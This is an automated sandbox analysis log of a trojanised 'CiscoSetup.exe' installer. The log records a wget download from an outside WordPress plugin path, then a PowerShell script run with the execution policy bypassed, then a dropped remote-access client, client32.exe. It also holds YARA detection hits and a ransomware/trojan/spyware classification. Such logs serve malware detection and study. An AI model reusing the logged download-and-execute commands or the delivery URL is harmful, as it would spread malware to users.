                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess token adjusted: SecurityJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11142A60 appears 1257 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 110B6CD0 appears 34 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 689B6F50 appears 33 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68C00950 appears 131 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68C0B69A appears 51 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1116B7E0 appears 56 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68C00934 appears 61 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 111434D0 appears 50 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 68C0A455 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11160790 appears 64 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1113F670 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11080C50 appears 78 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1115CBB3 appears 94 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 110290F0 appears 2592 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1105D340 appears 629 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1109CBD0 appears 32 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 1105D470 appears 67 times
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: String function: 11027550 appears 94 times
                                  Source: CiscoSetup.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-HMVS5.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                  Source: is-SHB4H.tmp.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: CiscoSetup.exe.2.drStatic PE information: Number of sections : 11 > 10
                                  Source: CiscoSetup.tmp.5.drStatic PE information: Number of sections : 11 > 10
                                  Source: is-HMVS5.tmp.6.drStatic PE information: Number of sections : 11 > 10
                                  Source: amsi32_3588.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.win@14/539@4/4
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11059270 GetLastError,FormatMessageA,LocalFree,11_2_11059270
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,11_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,11_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1109C750 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,12_2_1109C750
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1109C7E0 AdjustTokenPrivileges,CloseHandle,12_2_1109C7E0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11095C90 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,11_2_11095C90
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11088290 FindResourceA,LoadResource,LockResource,11_2_11088290
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\CiscoJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:304:WilStaging_02
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:304:WilStaging_02
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeFile created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe"
                                  Source: unknownProcess created: C:\Users\user\Desktop\download\CiscoSetup.exe "C:\Users\user\Desktop\download\CiscoSetup.exe"
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\download\CiscoSetup.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: sfc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
